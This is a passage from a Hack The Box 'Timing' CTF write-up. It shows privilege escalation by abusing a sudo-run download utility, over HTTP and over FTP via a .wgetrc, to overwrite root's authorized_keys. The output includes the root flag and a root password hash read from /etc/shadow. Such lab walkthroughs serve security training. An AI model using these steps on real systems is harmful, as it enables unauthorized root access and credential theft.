└─# chmod 600 id_rsa

Now we are set to execute this. Set up an HTTP server in the directory holding your Kali SSH key file and download it via the netutils HTTP option.

┌──(root💀kali)-[~/hackthebox/machine/timing]
└─# mv index.html tmp/
┌──(root💀kali)-[~/hackthebox/machine/timing]
└─# cd tmp/
┌──(root💀kali)-[~/hackthebox/machine/timing/tmp]
└─# ls
index.html
┌──(root💀kali)-[~/hackthebox/machine/timing/tmp]
└─# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...
10.10.11.135 - - [18/Dec/2021 17:16:37] "GET / HTTP/1.0" 200 -
10.10.11.135 - - [18/Dec/2021 17:16:38] "GET / HTTP/1.0" 200 -
aaron@timing:~$ sudo /usr/bin/netutils
netutils v0.1
Select one option:
[0] FTP
[1] HTTP
[2] Quit
Input >> 1
Enter Url: http://10.10.14.30/
Initializing download: http://10.10.14.30/
File size: 563 bytes
Opening output file /root/.ssh/authorized_keys
Server unsupported, starting from scratch with one connection.
Starting download


Downloaded 563 byte in 0 seconds. (0.69 KB/s)

And we are root now.

┌──(root💀kali)-[~/hackthebox/machine/timing]
└─# ssh -i id_rsa root@10.10.11.135
Welcome to Ubuntu 18.04.6 LTS (GNU/Linux 4.15.0-147-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

System information as of Sat Dec 18 17:33:24 UTC 2021

System load: 0.04 Processes: 173
Usage of /: 48.9% of 4.85GB Users logged in: 1
Memory usage: 10% IP address for eth0: 10.10.11.135
Swap usage: 0%


8 updates can be applied immediately.
8 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Tue Dec 7 12:08:29 2021
root@timing:~# id
uid=0(root) gid=0(root) groups=0(root)
root@timing:~# whoami
root
root@timing:~# cat root.txt
59f6feb7623ce66e648e736cd3958e24
root@timing:~# cat /etc/shadow | grep root
root:$6$94dEO.yJ$NVRpUQ0JnWZJKDRr//hnXKGJeiXCVSYkdlxYt7UgkvIr/3z8pkQwoEd67QtnWALkGV9A.C8T3hGtxUeZIH7ZW.:18826:0:99999:7:::

Privilege Escalation via wget (FTP)

There’s another method to do the same thing, but with wget (the FTP option). This can be done via a wgetrc file.

  • Wgetrc Commands (GNU Wget 1.21.1-dirty Manual)
aaron@timing:~$ cat .wgetrc
output_document = /root/.ssh/authorized_keys

Create a wget configuration file in the ‘aaron’ user’s home directory. Then set up an FTP server on Kali Linux.

┌──(root💀kali)-[~/hackthebox/machine/timing]
└─# cat authorized_keys
ssh-rsa ... root@kali
┌──(root💀kali)-[~/hackthebox/machine/timing]
└─# python3 -m pyftpdlib -p 21
[I 2021-12-18 18:35:02] concurrency model: async
[I 2021-12-18 18:35:02] masquerade (NAT) address: None
[I 2021-12-18 18:35:02] passive ports: None
[I 2021-12-18 18:35:02] >>> starting FTP server on 0.0.0.0:21, pid=6362 <<<

Make sure you have the authorized_keys file in place and start a Python FTP server.

aaron@timing:~$ sudo /usr/bin/netutils
netutils v0.1
Select one option:
[0] FTP
[1] HTTP
[2] Quit
Input >> 0
Enter Url+File: 10.10.14.30/authorized_keys
[I 2021-12-18 18:36:43] 10.10.11.135:35200-[anonymous] USER 'anonymous' logged in.
[I 2021-12-18 18:36:47] 10.10.11.135:35200-[anonymous] RETR /root/hackthebox/machine/timing/authorized_keys completed=1 bytes=562 seconds=0.004
[I 2021-12-18 18:36:47] 10.10.11.135:35200-[anonymous] FTP session closed (disconnect).

After this, you can login via SSH from Kali Linux.

┌──(root💀kali)-[~/hackthebox/machine/timing]
└─# ssh -i id_rsa root@10.10.11.135
Welcome to Ubuntu 18.04.6 LTS (GNU/Linux 4.15.0-147-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

System information as of Sat Dec 18 18:40:23 UTC 2021

System load: 0.02 Processes: 170
Usage of /: 48.9% of 4.85GB Users logged in: 0
Memory usage: 11% IP address for eth0: 10.10.11.135
Swap usage: 0%


8 updates can be applied immediately.
8 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Sat Dec 18 18:14:36 2021 from 10.10.14.30
root@timing:~# id
uid=0(root) gid=0(root) groups=0(root)
root@timing:~# whoami
root
root@timing:~# cat root.txt
59f6feb7623ce66e648e736cd3958e24

Summary of knowledge

  • dir brute with gobuster
  • LFI bypass with php://filter
  • get the uploaded shell’s file name using a PHP interactive shell: check the response time and match it with the PHP hash
  • .git leak ssh password
  • Privilege Escalation through shell script
  • pspy find suspicious process

Contact me

  • QQ: 1185151867
  • twitter: https://twitter.com/fdlucifer11
  • github: https://github.com/FDlucifer

I’m lUc1f3r11, a ctfer, reverse engineer, ioter, red teamer, coder, gopher, pythoner, AI lover, security researcher, hacker, bug hunter and more…